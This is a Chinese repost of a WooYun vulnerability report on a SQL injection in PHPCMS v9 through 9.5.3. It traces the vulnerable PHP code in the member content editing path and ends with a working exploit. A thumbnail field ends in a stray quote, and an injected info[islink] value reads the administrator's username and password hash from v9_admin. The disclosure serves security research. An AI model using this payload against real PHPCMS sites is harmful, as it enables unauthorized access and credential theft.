WooYun-2014-50636:PHPCMS全版本通杀SQL注入漏洞

  • A+
所属分类:乌云案例 渗透实战
摘要

漏洞作者: felixk3y来源:http://www.wooyun.org/bugs/wooyun-2014-050636

 

WooYun-2014-50636:PHPCMS全版本通杀SQL注入漏洞

漏洞作者: felixk3y

来源:http://www.wooyun.org/bugs/wooyun-2014-050636

简要描述

上次你们太不给力了,这次再来个通杀v9的SQL注入,包括最新v9.5.3版本

详细说明

漏洞产生

总的来说,是因为你们修复不完善,并没有理解到这个SQL注入的真正原因,同时 补丁后 并没有进行相应的测试 因而可绕过补丁 继续注入...

漏洞分析

首先看下面的代码

/phpcms/modules/member/content.php 202行 edit函数

public function edit() {

    $_username = $this->memberinfo['username'];

    if(isset($_POST['dosubmit'])) {

        $catid = $_POST['info']['catid'] = intval($_POST['info']['catid']);

        $siteids = getcache('category_content', 'commons');

        $siteid = $siteids[$catid];

        $CATEGORYS = getcache('category_content_'.$siteid, 'commons');

        $category = $CATEGORYS[$catid];

        if($category['type']==0) {//审核状态时,点编辑 再提交,进入if分支

            $id = intval($_POST['id']);

            $catid = $_POST['info']['catid'] = intval($_POST['info']['catid']);

            $this->content_db = pc_base::load_model('content_model');

            $modelid = $category['modelid'];

            $this->content_db->set_model($modelid);

            //判断会员组投稿是否需要审核

            $memberinfo = $this->memberinfo;

            $grouplist = getcache('grouplist');

            $setting = string2array($category['setting']);

            if(!$grouplist[$memberinfo['groupid']]['allowpostverify'] || $setting['workflowid']) {

                $_POST['info']['status'] = 1;

            }

            $info = array();

            foreach($_POST['info'] as $_k=>$_v) {

                if(in_array($_k, $fields)) $_POST['info'][$_k] = new_html_special_chars(trim_script($_v));

            }

            $_POST['linkurl'] = str_replace(array('"','(',')',",",' '),'',new_html_special_chars($_POST['linkurl']));

            //exit(print_r($_POST['info']));

            $this->content_db->edit_content($_POST['info'],$id);

            $forward = $_POST['forward'];

            showmessage(L('update_success'),$forward);

        }

    } else {

        //...

}

229行

$this->content_db->edit_content($_POST['info'],$id);

其中 $_POST['info'] 参数是一个数组,其内容是在线投稿的各项内容,如图所示

WooYun-2014-50636:PHPCMS全版本通杀SQL注入漏洞

好了,接下来我们看看这些数据都经过了怎样的处理...

跟上edit_content函数

/phpcms/model/content_model.class.php 第234行开始

public function edit_content($data,$id) {

        $model_tablename = $this->model_tablename;

        //前台权限判断

        if(!defined('IN_ADMIN')) {

            $_username = param::get_cookie('_username');

            $us = $this->get_one(array('id'=>$id,'username'=>$_username));

            if(!$us) return false;

        }

        $this->search_db = pc_base::load_model('search_model');

        require_once CACHE_MODEL_PATH.'content_input.class.php';

        require_once CACHE_MODEL_PATH.'content_update.class.php';

        $content_input = new content_input($this->modelid);

        $inputinfo = $content_input->get($data);//跟进此函数

        // /caches/caches_model/caches_data/content_input.class.php get函数

        $systeminfo = $inputinfo['system'];

第248行,我们可以看到 $_POST['info'] 数组进入了 get 函数,继续跟进

/caches/caches_model/caches_data/content_input.class.php 第55行开始

if($pattern && $length && !preg_match($pattern, $value) && !$isimport) showmessage($errortips);

$MODEL = getcache('model', 'commons');

$this->db->table_name = $this->fields[$field]['issystem'] ? $this->db_pre.$MODEL[$this->modelid]['tablename'] : $this->db_pre.$MODEL[$this->modelid]['tablename'].'_data';

if($this->fields[$field]['isunique'] && $this->db->get_one(array($field=>$value),$field) && ROUTE_A != 'edit') showmessage($name.L('the_value_must_not_repeat'));

$func = $this->fields[$field]['formtype'];

if(method_exists($this, $func)) $value = $this->$func($field, $value);//这里是关键,后面慢慢说明

if($this->fields[$field]['issystem']) {

    $info['system'][$field] = $value;

} else {

    $info['model'][$field] = $value;

}

我们重点关注这里是怎么处理的

if(method_exists($this, $func)) $value = $this->$func($field, $value);

为了方便看清楚程序在这里究竟是怎样处理的,我们在这行代码前面加入以下调试代码,看看都经过了哪些函数的处理...

if($pattern && $length && !preg_match($pattern, $value) && !$isimport) showmessage($errortips);

$MODEL = getcache('model', 'commons');

$this->db->table_name = $this->fields[$field]['issystem'] ? $this->db_pre.$MODEL[$this->modelid]['tablename'] : $this->db_pre.$MODEL[$this->modelid]['tablename'].'_data';

if($this->fields[$field]['isunique'] && $this->db->get_one(array($field=>$value),$field) && ROUTE_A != 'edit') showmessage($name.L('the_value_must_not_repeat'));

$func = $this->fields[$field]['formtype'];

echo "<br>Function :-->".$func."<--<br>";//这是添加的调试代码

if(method_exists($this, $func)) $value = $this->$func($field, $value);//这里是关键,后面慢慢说明

if($this->fields[$field]['issystem']) {

    $info['system'][$field] = $value;

} else {

    $info['model'][$field] = $value;

}

编辑投稿内容,提交

WooYun-2014-50636:PHPCMS全版本通杀SQL注入漏洞

看见了吧,我们提交的内容经过了如下几个函数:catid title keyword copyform textarea editor image islink box

经过分析后,我们重点关注image函数,继续跟上

/caches/caches_model/caches_data/content_input.class.php 第102行 image函数

function image($field, $value) {

    $value = str_replace(array("'",'"','(',')'),'',$value);

    return trim($value);

}

过滤了"'"、"("、")",但是呢 我们知道当开启了GPC的时候,单引号会被转义 '-->/'

明白了吧? image函数过滤了单引号,假设我们提交的数据恰巧经过了image函数,则单引号被过滤了,留下"/",那么这个"/"将会吃掉一个单引号,造成注入

3 漏洞Poc

条件:后台开启投稿,并要求审核

step1 在会员中心随便投一篇文章,提交

step2 点击编辑,如下

WooYun-2014-50636:PHPCMS全版本通杀SQL注入漏洞

step3 在缩略图栏填入 http://**.**.**.**/sql.jpg',如图

WooYun-2014-50636:PHPCMS全版本通杀SQL注入漏洞

提交后,报错了...

WooYun-2014-50636:PHPCMS全版本通杀SQL注入漏洞

漏洞最终利用Exp

在缩略图栏填入:http://**.**.**.**/sql.jpg'

点击提交,采用Tamper data抓包修改,将info[islink]修改为

,title=(select concat(username,password) from v9_admin where userid=1) -- felixk3y

点击确定,再点编辑 即可读取管理员账号 密码,如图

WooYun-2014-50636:PHPCMS全版本通杀SQL注入漏洞

漏洞证明

WooYun-2014-50636:PHPCMS全版本通杀SQL注入漏洞

修复方案

必须给力啊.

发表评论

您必须才能发表评论!